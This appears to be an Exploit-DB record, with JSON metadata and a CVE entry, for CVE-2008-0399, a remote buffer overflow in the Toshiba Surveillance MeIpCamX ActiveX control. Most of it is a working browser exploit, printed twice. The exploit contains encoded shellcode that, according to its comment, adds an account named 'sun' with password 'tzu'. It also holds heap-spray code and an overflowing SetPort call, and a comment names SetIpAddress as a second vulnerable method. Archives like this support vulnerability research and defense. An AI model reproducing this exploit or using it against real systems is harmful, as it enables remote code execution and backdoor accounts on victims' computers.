ID EDB-ID:4946
Type exploitdb
Reporter rgod
Modified 2008-01-20T00:00:00
Description
Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit. CVE-2008-0399. Remote exploit for windows platform
<!--
Toshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote
buffer overflow exploit (IE7/xpsp2)
a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio
codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab
rgod-tsid-pa-he-ru-ka
-
stay tuned with us ...
http://retrogod.altervista.org/join.html
security feeds, radio streams, techno/drum & bass stations to come
-->
<html>
<object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' />
</object>
<script language="javascript">
///add su one, user: sun pass: tzu
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<444;i++){memory[i] = block+shellcode}
//thx to Solar Designer and metasploit crew, is always intended
puf=""; for (i=0;i<28;i++){puf = puf + unescape("%0e")} //no more than 28, otherwise you fall in seh tricks
RecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself
</script>
</html>
# milw0rm.com [2008-01-20]
{"hash": "27f60e74cc46e2fc04126514df0ef13b841eaf8f33a20fe7a612afb0e2ab1aef", "id": "EDB-ID:4946", "lastseen": "2016-01-31T21:09:55", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4946/", "description": "Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit. CVE-2008-0399. Remote exploit for windows platform", "title": "Toshiba Surveillance MeIpCamX.DLL 1.0.0.4 Remote BoF Exploit", "sourceData": "<!--\nToshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote\nbuffer overflow exploit (IE7/xpsp2)\n\na demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio\ncodebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab\n\nrgod-tsid-pa-he-ru-ka\n-\nstay tuned with us ...\nhttp://retrogod.altervista.org/join.html\nsecurity feeds, radio streams, techno/drum & bass stations to come\n-->\n<html>\n<object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' />\n</object>\n<script language=\"javascript\">\n///add su one, user: sun pass: tzu\nshellcode = unescape(\"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949\" +\n \"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a\" +\n \"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241\" +\n \"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c\" +\n \"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c\" +\n \"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f\" +\n \"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b\" +\n \"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c\" +\n \"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871\" +\n \"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835\" +\n \"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b\" +\n \"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b\" +\n \"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34\" +\n \"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35\" +\n \"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550\" +\n \"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b\" +\n \"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c\" +\n \"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943\" +\n \"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370\" +\n \"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377\" +\n \"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630\" +\n \"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265\" +\n \"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330\" +\n \"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574\" +\n \"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030\" +\n \"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f\" +\n \"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e\" +\n \"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242\" +\n \"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741\" +\n \"%u7734%u4734%u4570\");\nbigblock = unescape(\"%u9090%u9090\");\nheadersize = 20;\nslackspace = headersize+shellcode.length;\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\nfillblock = bigblock.substring(0, slackspace);\nblock = bigblock.substring(0, bigblock.length-slackspace);\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\nmemory = new Array();\nfor (i=0;i<444;i++){memory[i] = block+shellcode}\n\n //thx to Solar Designer and metasploit crew, is always intended\n\npuf=\"\"; for (i=0;i<28;i++){puf = puf + unescape(\"%0e\")} //no more than 28, otherwise you fall in seh tricks\nRecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself\n</script>\n</html>\n\n# milw0rm.com [2008-01-20]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-0399"], "published": "2008-01-20T00:00:00", "osvdbidlist": ["40519"], "references": [], "reporter": "rgod", "modified": "2008-01-20T00:00:00", "href": "https://www.exploit-db.com/exploits/4946/"}
{"result": {"cve": [{"id": "CVE-2008-0399", "type": "cve", "title": "CVE-2008-0399", "description": "Multiple buffer overflows in Toshiba Surveillance (Surveillix) RecordSend ActiveX control (MeIpCamX.DLL 1.0.0.4) allow remote attackers to execute arbitrary code via long arguments to the (1) SetPort and (2) SetIpAddress methods.", "published": "2008-01-23T07:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0399", "cvelist": ["CVE-2008-0399"], "lastseen": "2017-09-29T14:25:43"}]}}